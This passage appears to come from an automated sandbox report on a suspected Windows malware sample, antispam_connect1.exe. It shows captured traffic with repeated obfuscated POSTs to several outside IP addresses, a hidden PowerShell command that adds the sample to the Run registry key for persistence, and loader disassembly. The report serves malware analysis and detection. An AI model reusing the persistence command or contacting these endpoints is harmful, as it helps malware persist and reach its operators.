                                            Oct 14, 2024 17:23:47.399589062 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:47 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            24192.168.2.55000291.212.166.91801600C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:23:47.421597004 CEST291OUTPOST / HTTP/1.1
                                            Host: 91.212.166.91
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: Ig3qaanA
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:48.151674986 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:48 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            25192.168.2.550003188.130.206.243801600C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:23:48.173584938 CEST293OUTPOST / HTTP/1.1
                                            Host: 188.130.206.243
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: MQtwlyZI
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:49.273998022 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:49 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            26192.168.2.55000446.8.232.106801900C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:23:53.403402090 CEST290OUTPOST / HTTP/1.1
                                            Host: 46.8.232.106
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: 512BqIU7
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:54.068721056 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:53 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            27192.168.2.55000546.8.236.61801900C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:23:54.091245890 CEST289OUTPOST / HTTP/1.1
                                            Host: 46.8.236.61
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: WfMAsHSr
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:54.790015936 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:54 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            28192.168.2.55000693.185.159.253801900C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:23:54.817363024 CEST292OUTPOST / HTTP/1.1
                                            Host: 93.185.159.253
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: kBrSLuLi
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:55.521861076 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:55 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            29192.168.2.55000791.212.166.91801900C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:23:55.552174091 CEST291OUTPOST / HTTP/1.1
                                            Host: 91.212.166.91
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: jKOpQuhc
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:56.267043114 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:56 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            30192.168.2.550008188.130.206.243801900C:\Users\user\Desktop\antispam_connect1.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 14, 2024 17:23:56.288460016 CEST293OUTPOST / HTTP/1.1
                                            Host: 188.130.206.243
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: rPhGbBkz
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:57.128833055 CEST183INHTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:57 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:11:22:11
                                            Start date:14/10/2024
                                            Path:C:\Users\user\Desktop\antispam_connect1.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\antispam_connect1.exe"
                                            Imagebase:0xd50000
                                            File size:6'955'008 bytes
                                            MD5 hash:970C918FDDE70FD4E57C0DB74CB54BE0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:2
                                            Start time:11:22:17
                                            Start date:14/10/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
                                            Imagebase:0xef0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:11:22:17
                                            Start date:14/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:11:22:28
                                            Start date:14/10/2024
                                            Path:C:\Users\user\Desktop\antispam_connect1.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\antispam_connect1.exe"
                                            Imagebase:0xd50000
                                            File size:6'955'008 bytes
                                            MD5 hash:970C918FDDE70FD4E57C0DB74CB54BE0
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:6
                                            Start time:11:22:33
                                            Start date:14/10/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
                                            Imagebase:0xef0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:11:22:33
                                            Start date:14/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:11:22:36
                                            Start date:14/10/2024
                                            Path:C:\Users\user\Desktop\antispam_connect1.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\antispam_connect1.exe"
                                            Imagebase:0xd50000
                                            File size:6'955'008 bytes
                                            MD5 hash:970C918FDDE70FD4E57C0DB74CB54BE0
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:9
                                            Start time:11:22:41
                                            Start date:14/10/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
                                            Imagebase:0xef0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:11:22:41
                                            Start date:14/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:6.3%
                                              Dynamic/Decrypted Code Coverage:53.8%
                                              Signature Coverage:69.2%
                                              Total number of Nodes:13
                                              Total number of Limit Nodes:0
                                              execution_graph 886 d56137 889 d563a9 886->889 888 d5613c 888->888 890 d563cc 889->890 891 d563d9 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 889->891 890->891 892 d563d0 890->892 891->892 892->888 878 36d4800 GetPEB 879 36d4859 878->879 880 36d49fd VirtualAlloc 879->880 883 36d48e0 879->883 884 36d52e1 880->884 882 36d4a57 VirtualAlloc 882->883 885 36d530a 884->885 885->882

                                              Callgraph

                                              Executed Functions

                                              Function 036D4800 Relevance: 9.5, APIs: 2, Strings: 4, Instructions: 506memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 36d4800-36d4857 GetPEB 1 36d485b-36d4870 call 36d6eac 0->1 4 36d4859 1->4 5 36d4872-36d48b3 1->5 4->1 6 36d48b5-36d48cc call 36d6eac 5->6 7 36d48e0 5->7 11 36d48ce-36d48de 6->11 12 36d48eb-36d48f0 6->12 9 36d48e2-36d48e8 7->9 11->6 11->7 12->7 13 36d48f2-36d4a92 VirtualAlloc call 36d52e1 VirtualAlloc call 36d6f1c 12->13 25 36d4a97-36d4ab5 call 36d6eef 13->25 28 36d4b1c-36d4b3a call 36d6f1c 25->28 29 36d4ab7-36d4ac3 25->29 35 36d4bc1-36d4bc9 28->35 36 36d4b40-36d4b4b 28->36 30 36d4ac5-36d4ad6 29->30 32 36d4ad8-36d4adc 30->32 33 36d4b0a 30->33 32->33 37 36d4ade-36d4ae2 32->37 38 36d4b0d-36d4b1a 33->38 40 36d4bcf-36d4be2 35->40 41 36d4c63-36d4c72 35->41 36->35 39 36d4b4d-36d4b57 36->39 37->33 42 36d4ae4-36d4b08 call 36d6eef 37->42 38->28 38->30 55 36d4b59-36d4b65 39->55 56 36d4bb1-36d4bbc 39->56 40->41 45 36d4be4-36d4c02 40->45 43 36d4c78-36d4c98 41->43 44 36d4d06-36d4d16 41->44 42->38 62 36d4c9a-36d4cb4 call 36d6eef 43->62 63 36d4d00-36d4d03 43->63 50 36d4d18 44->50 51 36d4d34-36d4d3a 44->51 48 36d4c5b-36d4c61 45->48 49 36d4c04-36d4c0a 45->49 48->41 48->45 57 36d4c0d-36d4c27 49->57 58 36d4d1b-36d4d1e 50->58 53 36d4d3d-36d4d48 51->53 60 36d4d4a-36d4d52 53->60 61 36d4d63-36d4d6b 53->61 64 36d4b6e-36d4b70 55->64 65 36d4b67-36d4b6c 55->65 56->39 59 36d4bbe 56->59 66 36d4c29-36d4c2c 57->66 67 36d4c42-36d4c44 57->67 68 36d4d2e-36d4d32 58->68 69 36d4d20-36d4d29 58->69 59->35 70 36d4d55-36d4d58 60->70 71 36d4d6d-36d4d71 61->71 72 36d4d89-36d4d9c 61->72 97 36d4cbe-36d4cc7 62->97 98 36d4cb6-36d4cbb 62->98 63->44 75 36d4ba5 64->75 74 36d4ba8-36d4bac 65->74 76 36d4c3d-36d4c40 66->76 77 36d4c2e-36d4c31 66->77 78 36d4c47 67->78 68->51 68->58 79 36d4d2b 69->79 80 36d4da1-36d4dbb 69->80 70->61 81 36d4d5a-36d4d61 70->81 71->72 82 36d4d73 71->82 72->9 87 36d4bae 74->87 88 36d4b72 74->88 75->74 76->78 84 36d4c38-36d4c3b 77->84 85 36d4c33-36d4c36 77->85 86 36d4c4a-36d4c50 78->86 79->68 80->53 81->61 81->70 89 36d4d76-36d4d84 82->89 84->86 85->84 85->86 86->57 93 36d4c52-36d4c58 86->93 87->56 90 36d4b74-36d4b8e 88->90 91 36d4b90-36d4b96 88->91 100 36d4d86 89->100 95 36d4b9a-36d4ba2 90->95 91->95 93->48 95->75 103 36d4cce-36d4ce3 97->103 104 36d4cc9 97->104 98->97 100->72 103->63 106 36d4ce5-36d4cf0 103->106 104->103 107 36d4cf6 106->107 108 36d4cf2-36d4cf4 106->108 109 36d4cf9 107->109 108->109 109->63
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 036D4A21
                                              • VirtualAlloc.KERNELBASE(00000000,0063F02F,00003000,00000040), ref: 036D4A89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3372838353.00000000036D4000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D4000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_36d4000_antispam_connect1.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: .$GetProcAddress.$l$lloc
                                              • API String ID: 4275171209-1161241244
                                              • Opcode ID: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                              • Instruction ID: 8c1ef1f331a6baa5a0d08d6e842694c3929d6c32fcef4a540cd39475d49376df
                                              • Opcode Fuzzy Hash: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                              • Instruction Fuzzy Hash: AA2269B1E002199FDB15CF99C984BAEBBB5FF48310F298169E905AB344DB70E941CF94

                                              Non-executed Functions

                                              Function 036D68A1 Relevance: .5, Instructions: 493COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 403 36d68a1-36d690b 404 36d690d-36d6910 403->404 405 36d6925-36d6930 403->405 406 36d6916-36d6922 404->406 407 36d6e23 404->407 408 36d6a7e-36d6a96 405->408 409 36d6936-36d694b 405->409 406->405 410 36d6e25-36d6e2b 407->410 411 36d6aac-36d6ac2 408->411 412 36d6a98-36d6a9a 408->412 413 36d694d-36d6952 409->413 414 36d6954-36d6959 409->414 416 36d6ac4-36d6adb 411->416 417 36d6ae0-36d6afb 411->417 412->407 415 36d6aa0-36d6aab 412->415 413->414 418 36d6996-36d6999 413->418 419 36d695e-36d6993 414->419 420 36d695b 414->420 415->411 423 36d6bf7-36d6c03 416->423 424 36d6afd-36d6aff 417->424 425 36d6b11-36d6b1c 417->425 421 36d69e9-36d69ef 418->421 422 36d699b 418->422 419->418 420->419 429 36d69f7-36d6a0b 421->429 430 36d69f1-36d69f4 421->430 428 36d699e-36d69ad 422->428 426 36d6c19-36d6c24 423->426 427 36d6c05-36d6c07 423->427 424->407 431 36d6b05-36d6b10 424->431 432 36d6b1e-36d6b36 425->432 433 36d6b73-36d6b88 425->433 437 36d6c36-36d6c47 426->437 438 36d6c26-36d6c34 426->438 427->407 434 36d6c0d-36d6c18 427->434 435 36d69af-36d69b2 428->435 436 36d69c4-36d69ce 428->436 441 36d6a0e-36d6a32 429->441 430->429 431->425 442 36d6b4c-36d6b56 432->442 443 36d6b38-36d6b3a 432->443 439 36d6b9e-36d6ba9 433->439 440 36d6b8a-36d6b8c 433->440 434->426 435->407 447 36d69b8-36d69c3 435->447 449 36d69d4-36d69d8 436->449 450 36d69d0-36d69d2 436->450 451 36d6c5d-36d6c68 437->451 452 36d6c49-36d6c4b 437->452 448 36d6c99-36d6c9c 438->448 454 36d6bdf-36d6be1 439->454 455 36d6bab-36d6bbd 439->455 440->407 453 36d6b92-36d6b9d 440->453 456 36d6a4c-36d6a57 441->456 457 36d6a34-36d6a37 441->457 445 36d6b5c-36d6b61 442->445 446 36d6be3-36d6be5 442->446 443->407 444 36d6b40-36d6b4b 443->444 444->442 458 36d6b6b-36d6b6e 445->458 459 36d6b63-36d6b65 445->459 463 36d6be7-36d6bf1 446->463 447->436 470 36d6c9f-36d6cb1 448->470 460 36d69d9-36d69df 449->460 450->460 468 36d6c6a-36d6c7e 451->468 469 36d6c80-36d6c94 451->469 452->407 467 36d6c51-36d6c5c 452->467 453->439 454->463 461 36d6bbf-36d6bc1 455->461 462 36d6bd3-36d6bdd 455->462 465 36d6a59-36d6a60 456->465 466 36d6a62-36d6a6b 456->466 457->407 464 36d6a3d-36d6a49 457->464 458->410 459->407 459->458 460->428 471 36d69e1-36d69e4 460->471 461->407 472 36d6bc7-36d6bd2 461->472 462->446 462->454 463->423 464->456 473 36d6a6d-36d6a73 465->473 466->473 467->451 468->448 469->448 474 36d6cc7-36d6cd2 470->474 475 36d6cb3-36d6cb5 470->475 478 36d6e16-36d6e1c 471->478 472->462 473->471 479 36d6a79-36d6a7c 473->479 476 36d6cd8-36d6cdc 474->476 477 36d6cd4-36d6cd6 474->477 475->407 480 36d6cbb-36d6cc6 475->480 481 36d6cdd-36d6ce2 476->481 477->481 478->410 482 36d6e1e-36d6e21 478->482 479->441 480->474 481->470 483 36d6ce4-36d6cef 481->483 482->407 482->410 484 36d6cf5-36d6d06 483->484 485 36d6e13 483->485 486 36d6d09-36d6d19 484->486 485->478 487 36d6d1b-36d6d1e 486->487 488 36d6d30-36d6d3a 486->488 487->407 489 36d6d24-36d6d2f 487->489 490 36d6d3c-36d6d3e 488->490 491 36d6d40-36d6d44 488->491 489->488 492 36d6d45-36d6d48 490->492 491->492 493 36d6d4f-36d6d55 492->493 494 36d6d4a-36d6d4d 492->494 493->485 495 36d6d5b-36d6d63 493->495 494->486 496 36d6d7d 495->496 497 36d6d65-36d6d7b 495->497 499 36d6d80-36d6d86 496->499 498 36d6db6-36d6db9 497->498 502 36d6dbc-36d6dd2 498->502 500 36d6d9d-36d6dae 499->500 501 36d6d88-36d6d8b 499->501 500->499 504 36d6db0-36d6db5 500->504 501->407 503 36d6d91-36d6d9c 501->503 505 36d6de5-36d6df0 502->505 506 36d6dd4-36d6dd7 502->506 503->500 504->498 508 36d6dfb-36d6e01 505->508 509 36d6df2-36d6df9 505->509 506->407 507 36d6dd9-36d6de4 506->507 507->505 510 36d6e03-36d6e09 508->510 509->510 510->485 511 36d6e0b-36d6e11 510->511 511->502
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3372838353.00000000036D4000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D4000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_36d4000_antispam_connect1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf64b45020a22b85927698f6973164189089b58c080edc75de3636de3a72678a
                                              • Instruction ID: fa8cbf6cce68f3fd3c87b6052050c94d18675d50393a6b5894489f83611feef5
                                              • Opcode Fuzzy Hash: cf64b45020a22b85927698f6973164189089b58c080edc75de3636de3a72678a
                                              • Instruction Fuzzy Hash: BE029132E0422A8FDF10CF7CC9806ADBBF6EB48381F514569E856DB345E674A981CB94

                                              Executed Functions

                                              Function 048F7A75 Relevance: .6, Instructions: 565COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2178917910.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_48f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 487e30d5ae676ecab576b10e1ee8b574ad0cb29bb080c2e6af799fd4536d1ea0
                                              • Instruction ID: 3a09079bc36a4a7204a46d8b051120c6d2bd74e51f7e82b8351949720732fd94
                                              • Opcode Fuzzy Hash: 487e30d5ae676ecab576b10e1ee8b574ad0cb29bb080c2e6af799fd4536d1ea0
